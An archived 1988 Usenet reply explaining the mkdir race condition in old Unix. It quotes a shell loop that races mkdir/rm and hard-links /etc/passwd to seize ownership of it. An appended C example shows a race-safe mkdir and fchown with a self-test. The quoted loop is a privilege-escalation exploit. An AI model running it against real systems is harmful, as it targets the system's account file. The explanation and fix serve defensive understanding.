Xref: utzoo news.sysadmin:1873 news.admin:4220
Path: utzoo!utgpu!watmath!clyde!att!osu-cis!tut.cis.ohio-state.edu!cwjcc!hal!nic.MR.NET!tank!mimsy!dftsrv!ames!amdcad!sun!pitstop!sundc!seismo!uunet!mcvax!hp4nl!botter!star.cs.vu.nl!maart
From: maart@cs.vu.nl (Maarten Litmaath)
Newsgroups: news.sysadmin,news.admin
Subject: Re: security hole
Keywords: security, bug
Message-ID: <1777@solo11.cs.vu.nl>
Date: 7 Dec 88 02:11:17 GMT
References: <1191@altger.UUCP>
Organization: V.U. Informatica, Amsterdam, the Netherlands
Lines: 24

blue@altger.UUCP (blue) writes:
\   while true
\   do
\       nice -39 mkdir foo &
\       rm -rf foo
\       ln /etc/passwd foo; rm -fr foo &
\       ls -l /etc/passwd
\   done

This is precisely why nowadays there's a mkdir() system call!
Formerly the mkdir scheme was as follows:

	mknod(path, S_IFDIR, dev);
	/* now the directory exists, its owner is root and it's empty */
	chown(path, uid, gid);	/* now the owner is set */
	chdir(path);
	link(path, ".");	/* make entry `.' in new directory */
	link(parent, "..");	/* make entry `..' */

The `rm -rf foo; ln /etc/passwd foo' must `hit' right AFTER the mknod(), but
BEFORE the chown(). Due to race conditions this scheme will eventually succeed.
-- 
fcntl(fd, F_SETFL, FNDELAY):          |Maarten Litmaath @ VU Amsterdam:
      let's go weepin' in the corner! |maart@cs.vu.nl, mcvax!botter!maart
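The lesson outlives mknod(): any privileged program that creates an object and then operates on it by name in a user-writable directory has the same window between the two steps. Added example, not Maarten's code nor the old mkdir(1) source: the create-then-chown sequence written so that the second step cannot be redirected, using mkdir(2) for the atomic create and an O_DIRECTORY|O_NOFOLLOW descriptor checked with fstat() before fchown(). Function names and the scratch path are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Step 2 of the old scheme, done safely: the ownership change goes through a
 * descriptor verified to be a directory, never through the swappable name. */
int chown_created_dir(const char *path, uid_t uid, gid_t gid)
{
    struct stat st;
    int fd = open(path, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (fd == -1)
        return -1;                          /* name no longer names a directory */
    int ok = fstat(fd, &st) == 0 && S_ISDIR(st.st_mode) && fchown(fd, uid, gid) == 0;
    close(fd);
    return ok ? 0 : -1;
}

/* Whole operation: atomic mkdir(2), then the descriptor-based chown. */
int mkdir_owned(const char *path, uid_t uid, gid_t gid)
{
    if (mkdir(path, 0700) == -1)            /* refuses any pre-existing object */
        return -1;
    return chown_created_dir(path, uid, gid);
}

/* Self-check in a scratch dir (constructed here, not from the post); returns 2 on success. */
int run_cases(void)
{
    char base[] = "/tmp/mkdir_owned_XXXXXX", dir[64], file[64];
    int ok = 0, fd;
    if (mkdtemp(base) == NULL)
        return 0;
    snprintf(dir, sizeof dir, "%s/foo", base);
    snprintf(file, sizeof file, "%s/target", base);
    /* 1: undisturbed run, the directory ends up owned by the caller */
    if (mkdir_owned(dir, getuid(), getgid()) == 0)
        ok++;
    /* 2: between the two steps the name is swapped for a hard link to a
     *    regular file (the window the post describes); the chown is refused */
    fd = open(file, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd != -1 && close(fd) == 0 && rmdir(dir) == 0 && link(file, dir) == 0
        && chown_created_dir(dir, getuid(), getgid()) == -1)
        ok++;
    unlink(dir); unlink(file); rmdir(base);
    return ok;
}
```

With mkdir(2) in place the swap can no longer reach the create step itself, and the descriptor-based second step closes the remaining name-based window for the chown.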